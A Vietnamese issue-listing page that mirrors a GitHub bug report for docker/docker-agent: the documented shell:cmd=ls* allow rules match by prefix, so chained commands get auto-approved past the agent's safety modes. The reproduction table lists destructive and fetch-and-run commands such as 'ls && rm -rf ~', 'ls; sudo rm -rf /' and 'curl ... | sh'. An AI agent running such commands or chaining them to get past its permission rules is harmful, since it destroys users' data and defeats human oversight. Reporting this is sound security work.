Hacktoberfest 2026: những issue maintainer đã đánh dấu cho tháng Mười, đang mở và phù hợp người mới. Xem issue Hacktoberfest

shell:cmd=ls* allow rules in docs approve chained commands

Đang mở
#4,476 1 bình luận 0 reaction 0 người được giao Xem trên GitHub

Maintainer thường phản hồi trong vòng 1 ngày

Chưa có ai nhận issue này.

Đánh giá

Độ khó
4/5
Thời gian dự kiến
3-5 ngày
Mức phù hợp với người mới
58/100
Loại issue
Lỗi
Độ rõ ràng
Khá rõ ràng
Mức độ hoạt động
Sôi nổi
Công nghệ
go
Lĩnh vực
cli, security

Hướng nghiên cứu

Start with the Safe Shell Agent permissions documentation and shell_grant.go, then reproduce the listed cases through CheckWithArgs. Compare the config allow-rule path with the strict matching already used for session grants. Done should include the documented safety change and warning, or matching code and tests if the optional code fix is selected.

Do mô hình lập chỉ mục viết ra từ nội dung của issue.

Mô tả

area/config area/docs area/security
Description

The permissions docs use shell:cmd=ls*, cat* and similar rules as safe
allow rules. The "Safe Shell Agent" example is presented as "Allow specific safe
commands, block dangerous ones". But matchGlob treats <word>* as a plain
prefix match, so an allow rule also covers anything chained after the word.
Deny rules only match commands that start with the denied word. Allow is
evaluated before the safety mode, so this gets past strict and restricted
as well.

#3573 fixed this only for session grants that override a preempt_yolo safety
verdict (shell_grant.go); config allow rules still use the loose prefix match.

Suggested fix:

  • Docs: replace the example with safety: balanced, whose classifier already
    approves ls, cat and grep and rejects chained commands. Warn that
    <word>* rules match chained commands.
  • Code (optional): apply the shell_grant.go strict matching to allow rules for
    shell and run_background_job.
Steps to Reproduce

Rules from the "Safe Shell Agent" example, checked with CheckWithArgs :

cmd Decision
ls && rm -rf ~ allow
ls; sudo rm -rf / allow
find / -exec rm -rf {} + allow
cat a > ~/.bashrc allow
grep x f; curl https://example.com/x.sh | sh allow
rm -rf ~ deny
Docker Agent version

v1.144.0

OS & terminal

Konsole

Screenshots
Image
Ngôn ngữ chính
Go
Star
3.4k
Fork
466
Merge trung bình
7 giờ 1 phút
Pull request đã merge (30 ngày)
332

Chuẩn bị môi trường

Mở trong Codespaces

Khởi chạy dev container của dự án ngay trên trình duyệt, bằng tài khoản GitHub của bạn.

  • Có Dockerfile hoặc tệp Docker Compose
  • Không có mẫu pull request
  • Không có hướng dẫn đóng góp

Bắt đầu từ đâu

  1. Đọc hết issue, rồi đọc hướng dẫn đóng góp của dự án.
  2. Bình luận trên issue rằng bạn sẽ nhận — tránh hai người làm cùng một việc.
  3. Fork repository và làm thay đổi trên một nhánh.
  4. Mở pull request có tham chiếu số hiệu của issue.

Issue khác của docker/docker-agent

Tất cả issue của docker/docker-agent

Issue tương tự

Thêm issue về Go

Nhận issue mới trong hộp thư của bạn

Bản tóm tắt ngắn những issue GitHub phù hợp với người mới.